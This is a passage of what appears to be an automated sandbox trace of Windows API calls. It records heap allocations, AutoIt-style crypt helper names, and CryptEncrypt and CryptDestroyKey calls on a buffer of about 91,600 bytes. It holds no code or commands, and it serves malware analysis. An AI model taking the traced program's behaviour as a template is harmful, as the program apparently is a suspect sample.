RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3c8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.489] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.489] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0030.489] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.490] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.490] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.490] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0030.491] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0030.491] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c7f0 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.491] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.491] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.491] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0030.492] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.492] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0030.493] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.493] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da268 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0030.494] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0030.494] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0030.494] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0030.494] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da2b8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2b8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0030.494] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.494] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0030.494] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.495] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0030.495] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.495] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.495] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0030.495] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0030.495] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0030.495] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0030.495] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0030.495] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.495] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0030.495] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.495] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0030.496] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.496] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x165c8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x165d0) returned 1 [0030.496] CharLowerBuffW (in: lpsz="byte[91601]", cchLength=0xb | out: lpsz="byte[91601]") returned 0xb [0030.498] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.498] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.498] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.498] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8f3130*, pdwDataLen=0x6ae220*=0x165c8, dwBufLen=0x165d0 | out: pbData=0x8f3130*, pdwDataLen=0x6ae220*=0x165d0) returned 1 [0030.499] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0030.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0030.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0030.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0030.499] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0030.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.499] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0030.509] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0030.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0030.509] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0030.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0030.509] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0030.509] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0030.510] CryptDestroyKey (hKey=0x7c2280) returned 1 [0030.510] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: 